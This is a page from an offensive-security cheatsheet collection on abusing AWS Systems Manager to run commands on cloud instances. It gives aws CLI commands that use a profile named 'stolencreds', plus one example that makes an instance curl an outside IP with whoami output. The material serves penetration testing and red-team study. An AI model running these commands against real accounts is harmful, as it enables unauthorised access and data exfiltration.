daemon-sec-cheatsheet

The cheatsheet vault for operators: AD, enumeration, exploitation, priv-esc, web, DFIR
git clone https://git.daemon-sec.xyz/daemon-sec-cheatsheet.git
Log | Files | Refs | README | LICENSE

aws-ssm.md (1562B)


      1 ---
      2 title: "AWS - Service - SSM"
      3 section: "Cloud"
      4 sectionSlug: "cloud"
      5 sourcePath: "docs/cloud/aws/aws-ssm.md"
      6 sourceUrl: "https://github.com/swisskyrepo/InternalAllTheThings/blob/203bb0c0b290/docs/cloud/aws/aws-ssm.md"
      7 sha: "203bb0c0b290"
      8 isIndex: false
      9 ---
     10 
     11 # AWS - Service - SSM
     12 
     13 ## Command execution
     14 
     15 :warning: The ssm-user account is not removed from the system when SSM Agent is uninstalled.
     16 
     17 SSM Agent is preinstalled, by default, on the following Amazon Machine Images (AMIs):
     18 
     19 * Windows Server 2008-2012 R2 AMIs published in November 2016 or later
     20 * Windows Server 2016 and 2019
     21 * Amazon Linux
     22 * Amazon Linux 2
     23 * Ubuntu Server 16.04
     24 * Ubuntu Server 18.04
     25 * Amazon ECS-Optimized
     26 
     27 ```powershell
     28 $ aws ssm describe-instance-information --profile stolencreds --region eu-west-1  
     29 $ aws ssm send-command --instance-ids "INSTANCE-ID-HERE" --document-name "AWS-RunShellScript" --comment "IP Config" --parameters commands=ifconfig --output text --query "Command.CommandId" --profile stolencreds
     30 $ aws ssm list-command-invocations --command-id "COMMAND-ID-HERE" --details --query "CommandInvocations[].CommandPlugins[].{Status:Status,Output:Output}" --profile stolencreds
     31 
     32 e.g:
     33 $ aws ssm send-command --instance-ids "i-05b████████adaa" --document-name "AWS-RunShellScript" --comment "whoami" --parameters commands='curl 162.243.███.███:8080/`whoami`' --output text --region=us-east-1
     34 ```
     35 
     36 ## References
     37 
     38 * [What is AWS Systems Manager? - AWS](https://docs.aws.amazon.com/systems-manager/latest/userguide/what-is-systems-manager.html)